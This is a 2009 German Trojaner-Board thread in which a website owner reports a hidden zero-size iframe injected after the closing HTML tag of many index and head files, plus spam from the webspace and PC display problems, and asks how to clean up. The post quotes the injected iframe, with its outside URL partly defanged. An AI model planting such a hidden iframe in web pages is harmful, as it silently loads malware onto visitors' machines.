Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Viren auf Webseite & weitere Probleme

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 08.04.2009, 12:11   #1
flyinghawk
 
Viren auf Webseite & weitere Probleme - Standard

Viren auf Webseite & weitere Probleme



Guten Tag

Ich bin neu hier im Forum und versuche mich jetzt einmal daran möglichst alles bei dem Thema richtig zu machen. Ich weiß nicht recht ob das der richtige Bereich ist, aber ich glaube schon.

Also ich habe versucht mit der Boardsuche und google etwas zu finden, aber eine Lösung für alle meine Probleme habe ich nicht wirklich gefunden.

Und nun hoffe ich, dass ihr mir helfen könnt

Also zu meinem Problemlange Vorgeschichte....)

So seit ungefähr Ende März hatte ich das Gefühl, dass da ein Virus auf meiner Seite sei. Jedoch schlug mein Virenprogramm nie an, also habe ich es einfach mal bei dem Gefühl belassen. Doch einige User sprachen mach darauf an, dass sie eine Virenmeldung bekommen würden, andere jedoch wiederum nicht. Also habe ich das alles mal an den Administrator des Webservers weitergeleitet. Er hat sich die Seite angeschaut und gesagt da sei kein Virus. Ich habe ihm geglaubt und erstmal nichts gemacht. Doch als mich dann ein Webmaster einer Affilate page ansprach habe ich mir das alles dann doch mal angesehen und fand das:

<iframe src="h**p:// google-stat.com /tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

In meiner index.php hatte sich das hinter das </html> am Ende angedockt. Und nicht nur da, auch in meiner head.php fand ich es. Jedoch kam es da vom Counter, dessen Dateien auch bearbeitet worden waren. Also habe ich gestern mit Hilfe von Filezilla die betroffenen Daten aus dem ftp gelöscht und ältere noch nicht betroffene vom 19.03. hochgeladen. Es waren viele Daten betroffen, nahezu jede index.php und index.html. Dann jedoch auch noch Daten in denen kein index vorkam. Zumindest glaubte ich, dass diese Dateien betroffen seien. Sie hatten alle etwas gemeinsam. Sie wurden das letzte Mal am 28.03.09 um 14:12 geändert. Und definitiv nicht von mir. Diese Dateien habe ich jedenfalls alle ersetzt. Nur ein paar Dateien hatte ich noch nicht gelöscht, das wollte ich heute machen.

1. Handelt es sich nun dabei um irgendeinen Virus oder was ist das?
Ich habe es definitiv nicht dort platziert.
2. Wie könnte das auf meine Webseite gelangt sein?
3. Habe ich das Problem nun für immer beseitigt?
Bisher hat der Virenscanner nicht wieder angeschlagen.
4. Kann man seine Webseite vor Viren schützen?

Hier mal ein Link zu meiner Webseite, aber ich kann nicht garantieren, dass kein Virus mehr drauf zu finden ist:
h**p://###############.de/
(Die Sternchen habe ich gemacht, weil ich ja nicht weiß ob noch einer drauf ist)



Nun habe ich aber wie oben beschrieben noch weitere Probleme:

Ich habe seit Januar andauernd Mail Delivery System Mails bekommen. Aber das geht immer nur eine Zeit lang ganz viele, dann keine mehr. Sie gehen an eine E-Mail Adresse, die ich vorher gar nicht kannte. Das ist eine bestimmte über meinen Webspace. Derjenige, der das Hosting leitet, hat zu mir gemeint, dass über meinen Webspace Spam verschickt wird.
Kann ich da etwas gegen machen?

Aber kommen wir zu einem weiteren, wichtigerem Problem.
Heute Morgen habe ich meinen PC ganz normal gestartet und es funktionierte alles ganz normal. Dann wollte ich die restlichen Dateien löschen, die ich gestern noch nicht gelöscht hatte, doch dabei traten Probleme auf.
Ich habe ganz normal die ftp Daten eingegeben und mich mit dem ftp über Filezilla verbunden. Direkt danach flackerte der Bildschirm seltsam. Es zuckte und unten konnte man das von oben sehen und die start leiste schob sich nach oben. Dann habe ich meinen PC verlassen um meinen Vater um Hilfe zu bitten und als wir wiederkamen sahen wir nur noch lila striche und pixel. Die flackerten und veränderten sich in einen weißen Bildschirm mit einem blauen horizontalen strich. Also haben wir den PC ausgemacht und wieder an und das Flackern fing sofort wieder an, doch zum Beispiel dieses Windows Ladebild konnte man ganz normal erkennen. Als dann der Willkommenbildschirm erschien fing wieder alles zu flackern an und man sah nur noch komische Farben, Striche etc. Bis es irgendwann bei einem komischen, durchsichtigen, weißen Bildschirm aufhörte. In dem weiß konnte man mit viel Mühe Firefox erkennen und unten die Taskleiste. Dann war noch ein dunkelgrauer Fleck zu sehen, der die ganze Mitte einnahm. Die Maus konnte man so viel bewegen wie man wollte, aber sie war nicht mehr sichtbar. Im abgesicherten Modus trat das Gleiche auf. Also kam mein Vater auf die glorreiche Idee ihn vllt mal nach Berlet zu schleppen. Als er dann dort gewesen ist funktionierte alles prima O.o Kein Problem trat mehr auf. Gar nichts. Eine wundersame Heilung...
Und nun funktioniert er auch wieder, jedoch hat er momentan keinen Internetzugang, weshalb ich auf dem PC meiner Schwester schreibe.

1. Weiß jemand weshalb das aufgetreten ist?
2. Lag es an der Hardware? (Bildschirm, Grafikkarte...)
2. Habe ich mir irgendwas vom ftp runtergeladen?
Ich habe mich ja vorher mit meiner Seite verbunden.

Die Logs kann ich momentan nicht posten, weil ich nicht weiß wie ich die von meinem PC auf den meiner Schwester bringen soll.
Gestern habe ich jedoch noch welche gemacht, weil der Verdacht nahe lag, dass mein PC der Verursacher des Viruses ist.
Das Internettool von HijackThis zum Auswerten des Logs hat mir jedoch nur bei 3 Dingen gesagt, dass sie unnötig seien. Gelöscht habe ich sie dann erstmal nicht...

Außerdem kenne ich mich kaum mit meinem PC aus
Ich habe Windows XP SP3 und mehr weiß ich nicht...

Ich hoffe jemand kann mir trotzdem helfen
Ich würde mich sehr darüber freuen.

Geändert von aharonov (06.03.2015 um 08:11 Uhr) Grund: website url entfernt

Alt 08.04.2009, 17:09   #2
grandnic11
 
Viren auf Webseite & weitere Probleme - Standard

Viren auf Webseite & weitere Probleme



Hiho

Ich glaube deine Website wurde ähnlich wie Paris Hiltons website gehackt. Du hast vielleicht einen Trojaner auf deinem PC oder deine Website wurde direkt gehackt. Wie du das wegmachst kann ich dir leider nicht sagen. Aber auf google oder von anderen membern bekommst du sicher eine Lösung
__________________


Antwort

Themen zu Viren auf Webseite & weitere Probleme
.com, abgesicherten modus, administrator, auswerten, bildschirm, e-mail, farben, firefox, flackern, ftp, google, handel, hijack, hijackthis, index.php, löschen, mail delivery, maus, prima, problem, programm, scan, spam, system, tan, tiere, viren, virus, windows, windows xp




Ähnliche Themen: Viren auf Webseite & weitere Probleme


  1. Probleme mit Trojaner auf Webseite!
    Plagegeister aller Art und deren Bekämpfung - 13.10.2014 (9)
  2. Fastsearchings.info und vermutlich weitere Viren
    Plagegeister aller Art und deren Bekämpfung - 15.07.2014 (15)
  3. Lollipop Virus doch nicht gelöscht? Weitere Viren...
    Plagegeister aller Art und deren Bekämpfung - 04.02.2014 (7)
  4. Windows 7: Trojan.Gen in Quarantäne und eventuell weitere Viren und Trojaner
    Log-Analyse und Auswertung - 23.09.2013 (19)
  5. BKA Virus und weitere Trojaner/Viren!
    Log-Analyse und Auswertung - 15.09.2013 (17)
  6. Viren auf Diskstation und PC - Adware.GamePlayLabs und weitere
    Log-Analyse und Auswertung - 28.05.2013 (13)
  7. Win32:Sirefef-ZT [trj] in System.exe + weitere Viren/Malware
    Plagegeister aller Art und deren Bekämpfung - 31.01.2013 (11)
  8. Exploit.Java.CVE-2011-3544.jy + Weitere Viren?
    Log-Analyse und Auswertung - 20.12.2012 (34)
  9. "Dieses Programm kann die Webseite nicht anzeigen" - weitere Schritte
    Log-Analyse und Auswertung - 03.10.2012 (3)
  10. TR/Rogue.kdv.665537 uns weitere Viren, Java
    Log-Analyse und Auswertung - 11.07.2012 (5)
  11. TR/Spy.Banker.Gen2 und TR/Offend.kdv.580984.1 und weitere Viren. Was tun ?
    Mülltonne - 01.04.2012 (2)
  12. TR/Trash.Gen (Systemfix, Gema, und weitere Viren)
    Log-Analyse und Auswertung - 29.12.2011 (22)
  13. backdoor.gen5 und weitere Viren
    Log-Analyse und Auswertung - 08.12.2011 (55)
  14. VB.Ahir und weitere Probleme
    Plagegeister aller Art und deren Bekämpfung - 17.10.2010 (55)
  15. Trojaner Navipromo.aa , eventl. noch weitere Viren....
    Plagegeister aller Art und deren Bekämpfung - 20.06.2009 (2)
  16. Verdacht auf weitere Viren
    Log-Analyse und Auswertung - 03.09.2008 (7)
  17. HijackThis log ... Madtol, oemxyz ..weitere Viren, Spys?
    Log-Analyse und Auswertung - 17.07.2005 (6)

Zum Thema Viren auf Webseite & weitere Probleme - Guten Tag Ich bin neu hier im Forum und versuche mich jetzt einmal daran möglichst alles bei dem Thema richtig zu machen. Ich weiß nicht recht ob das der richtige - Viren auf Webseite & weitere Probleme...
Archiv
Du betrachtest: Viren auf Webseite & weitere Probleme auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.